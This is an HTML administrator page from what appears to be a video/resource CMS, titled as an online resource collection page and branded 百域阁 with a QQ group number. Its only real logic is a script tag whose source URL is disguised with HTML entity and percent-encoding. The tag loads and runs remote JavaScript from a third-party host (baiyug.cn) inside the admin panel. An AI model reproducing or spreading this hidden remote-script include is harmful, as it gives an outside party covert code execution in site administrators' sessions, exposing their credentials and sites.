﻿<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<title>在线资源采集 - 百域阁 QQ群:320196229</title>
<script type="text/javascript" src="../js/jquery.js"></script>
<script type="text/javascript" src="../js/jq/jquery.cookie.js"></script>
<script type="text/javascript" src="../js/jq/jquery.validate.js"></script>
<script type="text/javascript" src="tpl/js/adm.js"></script>
<style type='text/css'>.table {margin-bottom:5px;font-size:12px;text-align:left;border-collapse: collapse;border: 1px solid #C6DCF2; }.table td {padding-left:10px;padding-right:10px;border: 1px solid #C6DCF2; }.table .td {height:25px;padding-left:0px;} .table tr {height:25px;line-height:25px;}.table tr .left{width:180px;text-align:right;padding-right:10px;color:#666;} .table_title {height:25px;line-height:25px;background: #F3F7FB;font-weight:bold;color:#0099cc;}.uok{width:30px;height:15px;color:white;background-color:green;display:-moz-inline-box;display:inline-block;}.uerr{width:30px;height:15px;color:white;background-color:red;display:-moz-inline-box;display:inline-block;}.red{color:red;}</style>
<script language="javascript">
$(function(){
	$("#xmllist").html( $("#xml").html());
	$("#xml").html("");
});
</script>
</head>
<body>
<table width="100%" border="0" cellspacing="0" cellpadding="0" >
<tr><td align=left><a href="./?m=collect-break"><font color="red" style="font-size:16px;">继续上次断点采集</font></a></td></tr>
<tr>
<td><span id="xmllist">在线资源载入中……  - 百域阁 QQ群:320196229</span></td>
</tr>
</table>
<span id="xml"><script src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#37;&#54;&#50;&#37;&#54;&#49;&#37;&#54;&#57;&#37;&#55;&#57;&#37;&#55;&#53;&#37;&#54;&#55;&#37;&#50;&#101;&#37;&#54;&#51;&#37;&#54;&#101;&#47;&#37;&#54;&#50;&#37;&#54;&#49;&#37;&#54;&#57;&#37;&#55;&#57;&#37;&#55;&#53;&#37;&#54;&#55;&#37;&#53;&#102;&#37;&#55;&#57;&#37;&#55;&#57;&#37;&#50;&#101;&#37;&#55;&#48;&#37;&#54;&#56;&#37;&#55;&#48;" charset="utf-8"></script></span>
</body>
</html>